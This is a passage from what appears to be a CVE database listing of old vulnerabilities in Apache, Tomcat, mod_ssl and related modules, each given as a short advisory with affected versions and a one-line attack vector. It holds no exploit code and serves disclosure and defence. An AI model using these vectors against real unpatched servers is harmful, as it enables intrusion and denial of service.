15249| [CVE-2004-2650] Spooler in Apache Foundation James 2.2.0 allows local users to cause a denial of service (memory consumption) by triggering various error conditions in the retrieve function, which prevents a lock from being released and causes a memory leak.
15250| [CVE-2004-2343] ** DISPUTED ** Apache HTTP Server 2.0.47 and earlier allows local users to bypass .htaccess file restrictions, as specified in httpd.conf with directives such as Deny From All, by using an ErrorDocument directive. NOTE: the vendor has disputed this issue, since the .htaccess mechanism is only intended to restrict external web access, and a local user already has the privileges to perform the same operations without using ErrorDocument.
15251| [CVE-2004-2336] Unknown vulnerability in Novell GroupWise and GroupWise WebAccess 6.0 through 6.5, when running with Apache Web Server 1.3 for NetWare where Apache is loaded using GWAPACHE.CONF, allows remote attackers to read directories and files on the server.
15252| [CVE-2004-2115] Multiple cross-site scripting (XSS) vulnerabilities in Oracle HTTP Server 1.3.22, based on Apache, allow remote attackers to execute arbitrary script as other users via the (1) action, (2) username, or (3) password parameters in an isqlplus request.
15253| [CVE-2004-1834] mod_disk_cache in Apache 2.0 through 2.0.49 stores client headers, including authentication information, on the hard disk, which could allow local users to gain sensitive information.
15254| [CVE-2004-1765] Off-by-one buffer overflow in ModSecurity (mod_security) 1.7.4 for Apache 2.x, when SecFilterScanPost is enabled, allows remote attackers to execute arbitrary code via crafted POST requests.
15255| [CVE-2004-1545] UploadFile.php in MoniWiki 1.0.9.2 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.hwp, which allows remote attackers to upload and execute arbitrary code.
15256| [CVE-2004-1438] The mod_authz_svn Apache module for Subversion 1.0.4-r1 and earlier allows remote authenticated users, with write access to the repository, to read unauthorized parts of the repository via the svn copy command.
15257| [CVE-2004-1405] MediaWiki 1.3.8 and earlier, when used with Apache mod_mime, does not properly handle files with two file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
15258| [CVE-2004-1404] Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code.
15259| [CVE-2004-1387] The check_forensic script in apache-utils package 1.3.31 allows local users to overwrite or create arbitrary files via a symlink attack on temporary files.
15260| [CVE-2004-1084] Apache for Apple Mac OS X 10.2.8 and 10.3.6 allows remote attackers to read files and resource fork content via HTTP requests to certain special file names related to multiple data streams in HFS+, which bypass Apache file handles.
15261| [CVE-2004-1083] Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.
15262| [CVE-2004-1082] mod_digest_apple for Apache 1.3.31 and 1.3.32 on Mac OS X Server does not properly verify the nonce of a client response, which allows remote attackers to replay credentials.
15263| [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters.
15264| [CVE-2004-0940] Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.
15265| [CVE-2004-0885] The mod_ssl module in Apache 2.0.35 through 2.0.52, when using the "SSLCipherSuite" directive in directory or location context, allows remote clients to bypass intended restrictions by using any cipher suite that is allowed by the virtual host configuration.
15266| [CVE-2004-0811] Unknown vulnerability in Apache 2.0.51 prevents "the merging of the Satisfy directive," which could allow attackers to obtain access to restricted resources contrary to the specified authentication configuration.
15267| [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access.
15268| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
15269| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
15270| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
15271| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
15272| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
15273| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
15274| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
15275| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
15276| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
15277| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
15278| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
15279| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
15280| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
15281| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
15282| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
15283| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
15284| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
15285| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
15286| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
15287| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
15288| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
15289| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
15290| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child proccess IDs (PID).
15291| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
15292| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
15293| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
15294| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
15295| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
15296| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
15297| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using a AuthNonce secret.
15298| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
15299| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
15300| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
15301| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
15302| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
15303| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
15304| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
15305| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
15306| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
15307| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
15308| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
15309| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
15310| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
15311| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
15312| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
15313| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
15314| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
15315| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
15316| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
15317| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
15318| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
15319| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
15320| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
15321| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
15322| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
15323| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
15324| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
15325| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
15326| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
15327| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
15328| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
15329| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
15330| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
15331| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
15332| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
15333| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
15334| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
15335| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
15336| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
15337| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
15338| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
15339| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
15340| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
15341| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
15342| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
15343| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
15344| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
15345| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
15346| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
15347| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
15348| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
15349| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
15350| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
15351| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
15352| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
15353| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
15354| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
15355| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
15356| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
15357| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
15358| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
15359| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
15360| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
15361| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
15362| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
15363| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
15364| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
15365| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
15366| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
15367| [CVE-2001-1013] Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
15368| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
15369| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
15370| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
15371| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
15372| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
15373| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
15374| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
15375| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
15376| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
15377| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
15378| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
15379| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
15380| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
15381| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, discloser on 20070724, is one such variant.
15382| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
15383| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
15384| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
15385| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
15386| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
15387| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
15388| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
15389| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
15390| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
15391| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
15392| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
15393| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
